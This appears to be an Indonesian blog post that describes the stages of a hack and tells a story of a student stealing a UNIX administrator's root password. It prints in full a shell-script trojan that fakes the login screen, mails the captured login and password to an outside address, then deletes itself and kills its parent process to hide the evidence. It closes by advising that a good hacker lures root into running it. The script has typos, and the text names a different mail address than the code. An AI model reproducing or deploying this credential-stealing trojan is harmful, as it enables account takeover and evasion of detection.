Secara umum melalui tahapan-tahapan sebagai berikut :
- Tahap mencari
tahu system komputer sasaran.
- Tahap penyusupan
-- Tahap
penjelajahan
- Tahap keluar dan
menghilangkan jejak.
Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :
Seorang
gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki
potensi memancing pengelola sistem komputer (administrator pemegang account
root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan
tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem
komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai
administrator UNIX. "Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda
trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER"
–ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN :
$PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan
ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem
UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah
perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya
tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat
beda dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta
pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka
segera timbul pesan
Login:root
Password:
********
Login
Incorrect
Tentu saja Administrator UNIX akan kaget
bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi
login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka
loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba
login dan mengisi password pada layar di atas, setelah itu maka otomatis data
login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai
disini maka si gadis lugu dan genit telah mendapatkan login dan password . . .
ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program
ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak
(masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada
2 baris terakhir dari program my_login di atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses
penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian
hilanglah program tersebut yang tentunya juga menhilangkan barang bukti.
Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . .
hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta
kuliahnya.
Sukses dari program
ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat
dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar
pemilik root menjalankan program ini
Tidak ada komentar:
Posting Komentar